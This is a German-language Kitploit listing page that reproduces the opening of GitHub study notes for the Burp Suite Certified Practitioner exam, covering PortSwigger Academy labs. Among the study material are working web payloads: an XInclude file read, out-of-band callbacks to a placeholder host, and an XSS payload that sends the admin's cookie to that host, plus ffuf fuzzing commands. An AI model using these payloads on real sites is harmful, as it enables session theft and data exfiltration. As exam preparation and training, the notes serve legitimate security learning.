Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Burp-Suite-Certified-Practitioner-Exam-Study — Praktische Studiennotizen und Walkthroughs für PortSwigger Academy Labs, die Web-Schwachstellen, Payloads, Enumeration und BSCP-Prüfungsstrategien abdecken. | Kitploit
Tools/GitHubGitHub/botesjuan/burp-suite-certified-practitioner-exam-study
SchwachstellenanalyseWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstestsLernen & BildungKuratierte RessourcenPayload-Entwicklung
Lernpfade & Kurse
Labs & Praxis
Top in Lernpfade & Kurse Nr.9
GitHubbotesjuan/burp-suite-certified-practitioner-exam-study

Burp-Suite-Certified-Practitioner-Exam-Study

Praktische Studiennotizen und Walkthroughs für PortSwigger Academy Labs, die Web-Schwachstellen, Payloads, Enumeration und BSCP-Prüfungsstrategien abdecken.

Repository anzeigen
1.5k385168vor 1 MonatVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Burp Suite Certified Practitioner Exam Study

Dies sind meine Lernnotizen mit über 110 PortSwigger Academy Labs. Ich habe diese Labs verwendet, um die Prüfung zum Burp Suite Certified Practitioner im Jahr 2023 zu bestehen. Meine BSCP-Qualifikation.
Für weitere Informationen besuche PortSwigger Academy, um die neuesten Lernmaterialien zu erhalten.


SCANNING - Enumeration
Focus Scanning
Scan non-standard entities

FOOTHOLD - Stufe 1
Content Discovery
DOM-XSS
XSS Cross Site Scripting
Web Cache Poison
Host Headers
HTTP Request Smuggling
Brute force
Authentication

PRIVILEGE ESCALATION - Stufe 2
CSRF - Account Takeover
Password Reset
SQLi - SQL Injection
JWT - JSON Web Tokens
Prototype pollution
API Testing
Access Control
GraphQL API Endpoints
CORS - Cross-origin resource sharing

DATA EXFILTRATION - Stufe 3
XXE - XML entities & Injections
SSRF - Server side request forgery
SSTI - Server side template injection
SSPP - Server Side Prototype Pollution
LFI - File path traversal
File Uploads
Deserialization
OS Command Injection

APPENDIX
Python Scripts
Payloads
Word lists
Focus target scanning
Approach
Extra Training Content

My Burp Tips

Ich empfehle, die Mystery lab challenge so oft wie möglich zu absolvieren, um deine Fähigkeiten zu testen und die Zeit zu verkürzen, die du brauchst, um die Schwachstellen zu identifizieren, bevor du die Prüfung ablegst.
Ich fand auch diesen Ratschlag von PortSwigger zum Wiederholen deiner Prüfung sehr informativ.
Sieh dir CryptoCat - Burp Suite Certified Professional (BSCP) Review + Tips/Tricks an, um einen frischen Blick auf die BSCP-Prüfung 2024 zu bekommen.




Buy Me A Coffee

Danke für den unterstützten Kaffee, \o/

Mein Burp Suite Certified Practitioner-Zertifikat.


Scanning

Die Enumeration der Webanwendungen beginnt mit initialem und gezieltem Scannen bei zeitlich begrenzten Engagements.

Focus Scanning
Scan non-standard entities

Focus Scanning

Aufgrund des knappen Zeitlimits bei Engagements oder in der Prüfung scanne definierte Einfügepunkte für bestimmte Anfragen.

scan-defined-insertion-points

Der Scanner erkannte eine XML-Injection-Schwachstelle am Parameter storeId, was zum Lesen der geheimen Carlos-Datei führte.```xml <xi:include parse="text" href="file:///home/carlos/secret"/>

>Out-of-Band-XInclude-Anfrage, benötigt eine gehostete DTD, um lokale Datei zu lesen.```xml
<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>

PortSwigger Lab: Schwachstellen schnell mit gezieltem Scannen entdecken

Scannen nicht standardmäßiger Datenstrukturen

Scannen nicht standardmäßiger Datenstrukturen mithilfe der Burp-Funktion, einen ausgewählten Einfügepunkt nach ausgewähltem Text in Antworten oder Anforderungen zu durchsuchen.

scan-selected-insertion-point

Identifizieren Sie die Schwachstelle über die Burp-Scanner-Ergebnisse.
Stehlen Sie in diesem Fall mithilfe des identifizierten XSS die Cookies des Admin-Benutzers, indem Sie das Payload am identifizierten Einfügepunkt platzieren.``` '"><svg/onload=fetch(//OASTIFY.COM/${encodeURIComponent(document.cookie)})>:CURRENT-USER-LOGIN-COOKIE-2ND-PART

>URL-kodieren Sie wichtige Zeichen.  

![admin-cookie-stealer](https://assets.kitploit.com/production/public/readmes/51008/64ba64b0fa7e1681859eb5d76a88f94fb91a78655f1ce768ff8e1b50f3cf57c1/990ac058ff6a9727193848c821acf60a43011fa7ba8dfd967ab6b3dd7f2e0bcb-display-v1.webp)  

>Verwenden Sie das Cookie des Admin-Benutzers, um auf das Admin-Panel zuzugreifen, indem Sie es in der aktuellen Browsersitzung ersetzen.  

[PortSwigger Lab: Scannen nicht standardmäßiger Datenstrukturen](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-scanning-non-standard-data-structures)  
    
-----

# Foothold  
  
# Content Discovery  

>Die Enumeration des Ziels beginnt mit dem Fuzzing von Web-Verzeichnissen und -Dateien. Nutzen Sie entweder die Burp-Engagement-Tools, die Content-Discovery-Option, um versteckte Pfade und Dateien zu finden, oder verwenden Sie `FFUF`, um Web-Verzeichnisse und -Dateien aufzulisten. Ein Blick auf `robots.txt` oder `sitemap.xml` kann Inhalte aufdecken.```bash
wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt

ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ

Burp-Engagement-Tool, Inhaltserkennung mit meiner kompilierten Wortliste burp-labs-wordlist als benutzerdefinierte Dateiliste.

content-discovery.png

Tool herunterladen